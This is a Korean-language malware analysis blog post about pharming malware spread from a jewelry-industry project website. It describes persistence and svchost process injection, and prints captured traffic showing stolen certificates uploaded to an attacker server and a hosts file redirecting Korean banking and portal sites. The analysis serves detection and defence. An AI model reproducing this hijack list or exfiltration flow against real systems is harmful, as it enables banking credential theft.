대구주얼리RIS사업단 사이트에서 파밍 유포중

FileName	java.exe
MD5	9E89057C09D22FE07F486B1A39C23609
SHA-1	E6CBE9BC705F2BF0110AA6D52449A816461B6103
Packer	PECompact 2.0x Heuristic Mode -> Jeremy Collake

현재 유포지로 사용 중인데, 현재 사이트에서 exploit은 발견되진 않지만 바이너리는 현재 최상위 디렉토리에 업로드되어 있다.

C:\드라이브에 디렉토리를 생성한다. 그리고 윈도우 시작시 자동으로 부팅을 위해 레지스트리에 등록한다.

C:\ 경로에 악성코드 드랍 후 프로세스 실행을 위해서 파라미터를 구성한 후에 CreateProcessA를 이용하여 프로세스를 실행한다.

드랍된 dll은 rundll32.exe를 이용하여 KoolMine이라는 함수를 실행하며 C:\Windows\System32\svchost.exe를 CREATE_SUSPENDED 상태로 실행한다.

WriteProcessMemory로 악성 data를 써넣는다. 최종적으로 악성 행위를 수행한다.

GET /fcg-bin/cgi_get_portrait.fcg?uins=2835357196?=28182 HTTP/1.1 Accept: */* Accept-Language: ko Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.0.3705) Host: users.qzone.qq.com Connection: Keep-Alive HTTP/1.1 200 OK Server: QZHTTP-2.37.1 Content-Encoding: gzip Cache-Control: max-age=86400 Content-Type: text/html Content-Length: 120 Date: Sat, 18 Apr 2015 07:04:19 GMT Connection: keep-alive Vary: Accept-Encoding ..........+./*)J.,qN..qJL...V2.065657.4S..V.()).../..O.7.+../J.+,.K.../...K.G(Gf...(........T240.343.37.3....j..2...{...

마찬가지로 파밍 IP를 users.qzone.qq.com에서 가져온다.

GET /ip.php?=1181 HTTP/1.1 Accept: */* Accept-Language: ko Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.0.3705) Host: 107.163.72.4 Connection: Keep-Alive HTTP/1.1 200 OK Date: Sat, 18 Apr 2015 07:04:15 GMT Server: Apache/2.2.4 (Win32) PHP/5.2.3 X-Powered-By: PHP/5.2.3 Content-Length: 32 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Language: ko 5b3412f55ff8ec4bd2a99b059084256dPOST /upload.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://107.163.72.4/upload.php Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7da3e1bd0314 Content-Length: 295 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: 107.163.72.4 Cache-Control: no-cache -----------------------------7da3e1bd0314 Content-Disposition: form-data; name="upload_file1"; filename="C:\DOCUME~1\nopsled\LOCALS~1\Temp\35c5c8545035186fd745d56e11d8692c.zip" Content-Type: application/x-zip-compressed PK.................... -----------------------------7da3e1bd0314-- HTTP/1.1 200 OK Date: Sat, 18 Apr 2015 07:04:18 GMT Server: Apache/2.2.4 (Win32) PHP/5.2.3 X-Powered-By: PHP/5.2.3 Content-Length: 0 Content-Type: text/html;charset=utf-8 Content-Language: ko

IP 해쉬한 후에 인증서를 유출한다. 역시나 서버는 APMSetup 사용 중.

100.43.168.180    shinhan.com 100.43.168.180    www.shinhan.com 100.43.168.180    search.daum.net 100.43.168.180    search.naver.com 100.43.168.180    kisa.kbstcr.com 100.43.168.180    kisa.shinhcn.com 100.43.168.180    kisa.ibk.co.kr 100.43.168.180    kisa.kab.co.kr 100.43.168.180    kisa.kfcc.co.kr.r 100.43.168.180    kisa.kbstor.com.r 100.43.168.180    KisA.nONGhuyp.coM.r 100.43.168.180    kisa.shinhon.com.r 100.43.168.180    kisa.wooribenk.com.r 100.43.168.180    kisa.honabenk.com.r 100.43.168.180    kisa.epostbenk.go.kr.r 100.43.168.180    kisa.idk.co.kr.r 100.43.168.180    kisa.kcb.co.kr.r 100.43.168.180    kisa.kfoc.co.kr.r 100.43.168.180    kisa.hanabenk.com.r 100.43.168.180    www.kbstar.com.r 100.43.168.180    www.nonghyup.com.r 100.43.168.180    www.shinhan.com.r 100.43.168.180    www.wooribank.com.r 100.43.168.180    www.hanabank.com.r 100.43.168.180    www.epostbank.go.kr.r 100.43.168.180    www.ibk.co.kr.r 100.43.168.180    www.idk.co.kr 100.43.168.180    www.keb.co.kr.r 100.43.168.180    www.kfcc.co.kr.r 100.43.168.180    BestLotto.co.kr 100.43.168.180    LottoRICH.Co.kr 100.43.168.180    lottok.co.kr 100.43.168.180    basiclotto.co.kr 100.43.168.180    lotto369.net 100.43.168.180    g9.co.kr 100.43.168.180    lottons.com 100.43.168.180    lottopangpang.co.kr 100.43.168.180    lottogold.co.kr 100.43.168.180    lottoplay.co.kr 100.43.168.180    lottorich.co.kr 100.43.168.180    lottosmart.kr 100.43.168.180    nlotto.co.kr 100.43.168.180    www.BestLotto.co.kr 100.43.168.180    www.LottoRICH.Co.kr 100.43.168.180    www.lottok.co.kr 100.43.168.180    www.basiclotto.co.kr 100.43.168.180    www.lotto369.net 100.43.168.180    www.g9.co.kr 100.43.168.180    www.lottons.com 100.43.168.180    lottopangpang.co.kr 100.43.168.180    www.lottogold.co.kr 100.43.168.180    www.lottoplay.co.kr 100.43.168.180    www.lottorich.co.kr 100.43.168.180    www.lottosmart.kr 100.43.168.180    www.nlotto.co.kr 100.43.168.180     100.43.168.180    www.bing.com 100.43.168.180    www.11st.co.kr 100.43.168.180    www.gmarket.net 100.43.168.180    www.google.co.kr 100.43.168.180    nate.com 100.43.168.180    www.nate.com 100.43.168.180    daum.com 100.43.168.180    daum.co.kr 100.43.168.180    www.daum.co.kr 100.43.168.180    www.daum.net 100.43.168.180    daum.net 100.43.168.180    www.zum.com 100.43.168.180    zum.com 100.43.168.180    kisa.nenghuyp.com 100.43.168.180    kisa.honabenk.com 100.43.168.180    kisa.idk.co.kr 100.43.168.180    kisa.kcb.co.kr 100.43.168.180    kisa.kfoc.co.kr 100.43.168.180    naver.com 100.43.168.180    www.naver.co.kr 100.43.168.180    naver.co.kr 100.43.168.180    www.nonghyup.com 100.43.168.180    www.naver.com 100.43.168.180    naver.kr 100.43.168.180    www.naver.kr 100.43.168.180    kisa.kbstor.com 100.43.168.180    kisa.nonghuyp.com 100.43.168.180    kisa.shinhon.com 100.43.168.180    kisa.wooribenk.com 100.43.168.180    kisa.ibek.co.kr 100.43.168.180    kisa.epostbenk.go.kr 100.43.168.180    kisa.hanabenk.com 100.43.168.180    kisa.keb.co.kr 100.43.168.180    kisa.kfcc.co.kr 100.43.168.180    www.nate.net 100.43.168.180    www.nate.co.kr 100.43.168.180    nate.co.kr 100.43.168.180    hanmail.net 100.43.168.180    www.hanmail.net 100.43.168.180    www.hanacbs.com 100.43.168.180    kfcc.co.kr 100.43.168.180    www.kfcc.co.kr 100.43.168.180    www.daum.net 100.43.168.180    daum.net 100.43.168.180    www.kbstor.com 100.43.168.180    www.nonghuyp.com 100.43.168.180    www.shinhon.com 100.43.168.180    www.wooribenk.com 100.43.168.180    www.ibek.co.kr 100.43.168.180    www.epostbenk.go.kr 100.43.168.180    www.hanabenk.com 100.43.168.180    www.keb.co.kr 100.43.168.180    www.citibank.co.kr 100.43.168.180    www.citibank.co.kr.r 100.43.168.180    www.standardchartered.co.kr.r 100.43.168.180    www.standardchartered.co.kr 100.43.168.180    www.suhyup-bank.com.r 100.43.168.180    www.suhyup-bank.com 100.43.168.180    www.kjbank.com.r 100.43.168.180    www.kjbank.com 100.43.168.180    openbank.cu.co.kr.r 100.43.168.180    openbank.cu.co.kr 100.43.168.180    www.knbank.co.kr 100.43.168.180    www.knbank.co.kr.r 100.43.168.180    www.busanbank.co.kr.r

호스트파일을 변조한 구닥다리 파밍.